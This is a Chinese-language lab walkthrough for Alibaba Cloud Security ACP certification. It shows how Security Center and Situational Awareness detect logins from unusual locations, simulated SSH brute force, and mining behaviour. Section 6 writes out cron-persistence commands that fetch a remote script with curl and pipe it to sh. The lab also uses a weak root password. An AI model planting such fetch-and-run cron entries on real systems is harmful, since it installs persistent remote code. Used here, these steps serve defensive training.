阿里云安全ACP认证考试实验之云盾之云安全中心与态势感知入门体验

本文涉及的产品
Web应用防火墙 3.0,每月20元额度 3个月
云安全中心漏洞修复资源包免费试用,100次1年
云安全中心 防病毒版,最高20核 3个月
简介: 阿里云安全ACP认证考试实验之云盾之云安全中心与态势感知入门体验

1、实验概述

通过本实验可对云安全中心,态势感知的一些基本操作有深入了解以及如何来对实例进行安全监控

2、实验目标

完成此实验可以掌握的能力有:

在安骑士中添加白名单、登录安全设置

通过态势感知查看实例的相关告警威胁

3、学前建议:

了解安骑士、态势感知控制台


第 1 章:实验背景


1.1 背景知识


安骑士是阿里云云盾推出的一款轻量级主机服务,支持阿里云和非阿里云服务器。通过采集用户主机资产和运行状态、脆弱性和安全告警数据,提供主机威胁检测和自动防御的能力。

态势感知是阿里云云盾下的云上安全监控和诊断服务,面向云上资产提供安全事件检测、漏洞扫描、基线配置核查等服务。态势感知结合了阿里自主研发的大数据和机器学习算法,通过多引擎查杀帮助实时全面了解和有效处理服务器的安全隐患,并实现对云上资产的集中安全管理 。


第 2 章:实验详述


2.1 实验资源


在弹出的左侧栏中,点击 创建资源 按钮,开始创建实验资源。

资源创建过程需要1-3分钟。完成实验资源的创建后,用户可以通过 实验资源 查看实验中所需的资源信息,例如:阿里云账号等。


2.2 实验步骤


通过沙箱申请资源成功后,在本地保存下阿里云账号信息,包括企业别名、子用户名称、子用户密码、AK ID 和AK Secret。点击前往控制台按钮

20200709132312213.jpg

进入登录页面,输入申请资源处提供的账号,@前为子用户名称,@后为企业别名

20200709132351402.jpg

复制用户密码

20200709132411175.jpg

点击登录

一、创建黑客ECS

1.在与沙箱生成的目标ECS的另一个地域,创建一台黑客ECS

点击云服务器ECS


20200709132438545.jpg


此处可以看到,我们的目标站点在华东二


20200709132458197.jpg

点击下图的创建实例

20200709132518442.jpg

202007091325362.jpg


镜像选择centos 6.8即可

20200709132556490.png

2.网络选择默认vpc即可


20200709132617762.png


3.管理员root 密码设定为1234@abcd,实例名可以为hack


20200709132637794.png

4.点击确认订单


勾选服务条款,并点击创建实例


5.创建成功


二、将本地IP加入白名单以防被拉黑


1.查询本地IP。通过浏览器打开 www.ip138.com 来查询本地IP

20200709132716740.png

2.在产品服务中找到安骑士


20200709132735436.png


3.在安骑士找到设置,安全配置,点击登录ip拦截加白(点此设置)

20200709132754853.png


4.点击添加

20200709132816520.png

5.将刚刚找到的本地ip复制到源IP中,将目标主机添加到其中,点击确定白名单增加完成。(如果没有列出目标服务器的IP,对象类型选择择:弹性公网EIP)


20200709132835308.png三、利用不同地域的黑客ECS远程登录监控目标


1.在安骑士入侵检测,异常登录中,查看异地登录,目前没有记录


20200709132854999.png


2.点击登录安全设置

20200709132913542.png

3.点击添加,选择常用登录地,资产勾选目标ECS,并点击确定

2020070913293466.png


4.利用本地远程登录目标ECS


可通过安骑士资产列表查看目标ecs IP地址

20200709132952440.png


Mac版直接通过终端登录,windows版请参考云中沙箱 帮助文档

20200709133011935.png

5.刷新可以看到没有告警提示

20200709133029710.png


6.重复上述登录步骤,登录hack服务器,并远程连接目标ECS


20200709133046607.png

7.再次刷新,可看到异地登录告警记录

2020070913310335.png


四、利用黑客ECS通过SSH登录监控目标ECS(密码故意打错模拟爆破)


1.本地ssh登录黑客ECS

20200709133121828.png


2.通过黑客ECS ssh 登录目标ECS,故意打错密码(多操作几次,3-6次),态势感知会判断为暴破。


20200709133140249.png


五、通过态势感知进行查看威胁

1.在产品服务->安全->态势感知 打开态势感知控制台


20200709133158125.png



2.可以看到有一个安全告警,是之前异地登录的告警


20200709133217303.png

3.点击攻击分析,可查看攻击分析的异常。(模拟暴力破解的异常6个小时内才会同步到攻击分析)

20200709133235780.png


4.点击安全大屏,也可查看安全威胁。

2020070913325433.png


六、模拟矿机异常行为

在目标主机输入命令,模拟矿机行为

echo "/5 * curl -sL https://1.co/6n11111PMR | sh" > /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo "/5 * curl -sL https://1.co/6n1111P1MR | sh" > /var/spool/cron/crontabs/root
crontab –l

20200709133330441.png

过几分钟,在态势感知的 安全告警处理 中,可查看到 进程异常行为。

20200709133348562.png

目录
相关文章
|
8天前
|
运维 安全 Cloud Native
阿里云云安全中心全面解析
阿里云云安全中心作为一款集持续监测、深度防御、全面分析、快速响应能力于一体的云上安全管理平台,为企业提供了全方位的安全保障。本文将详细介绍阿里云云安全中心的功能、应用场景、收费标准以及购买建议,帮助您更好地了解和利用这一强大的安全工具。
阿里云云安全中心全面解析
|
1月前
|
云安全 人工智能 自然语言处理
用AI来做云安全是怎样一种体验?阿里云安全AI能力大曝光
阿里云内容安全大模型获CSA安全金盾奖
1045 2
|
1月前
|
存储 云安全 人工智能
带你读《阿里云安全白皮书》(二十四)——云上安全建设最佳实践(2)
本文介绍了阿里云在AI大模型云上安全方面的最佳实践,涵盖数据安全、模型安全、内容安全和合规性四大关键挑战。阿里云通过数据加密、私有链接传输、机密计算等技术手段,确保数据和模型的安全性;同时,提供内容安全检测、Prompt问答护栏等功能,保障生成内容的合法合规。此外,阿里云还帮助企业完成算法及模型备案,助力客户在AI大模型时代安全、合规地发展。
|
1月前
|
存储 云安全 安全
带你读《阿里云安全白皮书》(二十一)——云上安全重要支柱(15)
阿里云安全白皮书(2024版)详细介绍了其在面对线上威胁时的快速响应与恢复能力。通过一体化的安全运营能力,阿里云帮助客户在极端威胁下快速感知、响应风险并恢复数据及服务。白皮书还涵盖了全面的资产梳理、及时的威胁情报分析、高效的风险识别与治理、专业的安全服务等内容,旨在为企业提供全方位的安全保障。
|
1月前
|
云安全 监控 安全
带你读《阿里云安全白皮书》(二十三)——云上安全建设最佳实践
淘宝作为全球最大规模、峰值性能要求最高的电商交易平台,基于阿里云成功通过了多年“双11”峰值考验。淘宝的安全体系涵盖了系统安全、网络安全、账号与凭据安全、云资源安全等多个方面,通过阿里云提供的多种安全产品和服务,确保了业务的稳定运行和数据的安全。淘宝的安全实践不仅为自身业务提供了坚实的保障,也为其他行业的云上安全建设提供了宝贵的经验和参考。
|
1月前
|
云安全 存储 安全
带你读《阿里云安全白皮书》(二十二)——云上安全重要支柱(16)
在全球化背景下,阿里云高度重视云平台的安全合规建设,确保客户在不同地区和行业能够满足监管要求。阿里云通过140多项安全合规认证,提供全面的专业安全合规服务和便捷高效的安全合规产品,帮助企业高效且低成本地实现安全合规目标。更多详情可参见阿里云官网“阿里云信任中心 - 阿里云合规”。
|
1月前
|
云安全 安全 数据安全/隐私保护
带你读《阿里云安全白皮书》(十八)——云上安全重要支柱(12)
随着数智化发展,企业面临复杂的资产管理需求。阿里云提供全链路身份管控与精细化授权方案,涵盖细粒度权限管理和身份凭证保护,确保数据资产安全。支持多因素认证和最小权限原则,减少风险暴露,提升企业安全效率。详情见《阿里云安全白皮书(2024版)》。
|
1月前
|
云安全 安全 网络安全
带你读《阿里云安全白皮书》(十一)——云上安全重要支柱(5)
阿里云通过内部红蓝对抗体系,常态化模拟真实场景下的APT攻击,持续提升平台安全性。蓝军团队采用MITRE ATT&CK框架,系统模拟外部攻击,红军团队则进行持续防守。整个过程包括攻击规划、执行和复盘修复阶段,确保及时发现并修复安全漏洞,提升整体防御水平。
|
1月前
|
云安全 安全 数据可视化
带你读《阿里云安全白皮书》(十二)——云上安全重要支柱(6)
阿里云构建了7x24小时全自动化红蓝对抗平台,通过深度整合内外部攻防案例,进行高频次、自动化的演练,提升对复杂攻击的应对能力,确保安全防护体系持续优化。平台具备全自动化演练、随机性与多样化、可视化输出、节点负载智能控制、日志追踪与审计、应急场景秒级熔断等特性,确保演练过程稳定高效。
|
1月前
|
云安全 存储 运维
带你读《阿里云安全白皮书》(十七)——云上安全重要支柱(11)
阿里云提供了《阿里云安全白皮书(2024版)》,介绍客户数据安全保护技术能力。针对敏感行业,阿里云推出了专属区域和云盒两种形态,确保数据本地存储和合规要求,同时提供标准的公有云产品。此外,阿里云数据安全中心提供敏感数据识别、细粒度数据审计、数据脱敏/列加密、数据泄露检测与防护等四大功能,全面保障数据安全。

热门文章

最新文章